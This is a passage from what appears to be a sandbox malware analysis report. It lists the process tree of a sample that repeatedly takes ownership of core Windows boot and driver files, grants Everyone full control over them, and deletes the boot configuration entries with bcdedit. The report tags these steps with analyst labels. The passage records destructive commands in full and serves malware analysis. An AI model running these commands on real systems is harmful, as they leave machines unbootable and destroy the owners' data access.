  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1708
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1732
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1088
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1436
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1428
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:924
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1364
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1108
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2304
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2392
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2144
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1992
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:304
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:864
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:1752
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:888
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2024
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:1972
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2460
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2116
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2160
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:1592
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1276
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2388
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:2424
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2360
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2520
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2556
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2408
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2576
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:856
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2936
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2328
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2080
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2756
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2804
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2900
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2876
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2760
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2740
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2932
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:3012
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2904
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2996
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2640
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2988
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:1632
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2616
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1864
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2176
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2648
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Modifies file permissions
  PID:832
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:572
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:1704
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1140
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Possible privilege escalation attempt
  PID:1984
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1420
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2844
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1216
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2428
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:628
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1456
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1408
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1564
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:284
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1568
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1896
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1500
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1508
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1072
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2000
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2984
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2944
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2848
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2824
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2856
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2972
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2700
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2468
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2200
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2436
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Possible privilege escalation attempt
  PID:2188
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:288
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2976
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2240
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1656
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:444
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:3032
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2100
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Possible privilege escalation attempt
  PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2808
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1524
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1292
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1252
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2008
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1052
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1512
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2836
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2372
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1888
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2028
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:924
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:780
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2324
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1928
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2968
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:1484
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:1988
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:844
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1936
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1752
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:1740
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:888
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2056
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2464
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Possible privilege escalation attempt
  PID:2136
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:2160
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1592
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1276
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2388
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2360
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:308
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1272
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2124
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2940
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2484
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:320
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2716
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2748
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2896
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2872
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2800
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2900
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2876
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2760
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2740
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2932
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:3012
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2904
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2996
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2640
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2988
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2628
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2744
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:1864
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2176
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2648
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:832
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:572
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1704
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1140
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:1984
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2844
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2440
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:996
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:628
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1456
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1952
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2592
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1612
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:300
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2816
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1860
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1616
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:1508
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1072
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:1680
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2000
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2984
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2944
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2848
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2824
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2856
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2972
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2180
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:484
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2200
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2436
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Modifies file permissions
